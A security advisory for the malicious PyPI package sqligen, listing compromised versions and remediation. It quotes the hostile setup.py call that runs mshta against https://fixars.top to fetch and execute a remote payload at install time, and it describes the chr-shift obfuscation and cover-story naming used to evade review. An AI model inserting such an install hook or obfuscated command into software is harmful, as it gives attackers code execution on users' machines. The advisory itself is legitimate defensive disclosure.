pypi · Malicious package advisory
Malwaresqligen
MAL-2026-6515
Malicious code in sqligen (PyPI)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (de59ac5884f286d69e42a71ba0cb7b99aa06d2b1f0e28a279a84d3db86eb3196)
setup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names ('GetDefaultSystemPolicy' / 'CalculateNodeDrift', backed by integer arrays presented as 'InterruptThresholds' and 'ThreadPingLatencies') decode via chr(value+14) arithmetic to the strings 'mshta' and 'https://fixars.top'. On Windows, GetGitCommitHash() runs subprocess.check_output(['mshta', 'https://fixars.top'], shell=True), executing an arbitrary remote HTA payload from fixars.top. This codepath is reached from CustomInstallCommand, CustomBuildPyCommand, and CustomDevelopCommand, so any `pip install sqligen` (or `pip install -e.`) on a Windows host triggers remote code execution under the installing user's account. The obfuscation (cover-story variable names, chr-shift encoding of the command and URL) demonstrates intentional evasion of source review; legitimate build tooling does not encode 'mshta' as 'hardware interrupt latency thresholds'. The fetched payload is attacker-controlled and unrelated to the package's stated SQL-generation purpose.
## Source: kam193 (b84d9f4006cbb5db6790a6de402754f0937758e861efe6ec0bc3ba156415327c)
During installation, the code attempts to download and start a malicious executable.
Likely related to 2025-08-raknet-testing-package.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-easyaillm
Reasons (based on the campaign):
- Downloads and executes a remote executable.
- obfuscation
- malware
- tool:mshta
Compromised versions (8)
- 1.0.0
- 1.0.5
- 1.0.6
- 1.0.7
- 1.0.8
- 1.1.1
- 1.1.3
- 1.1.4
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.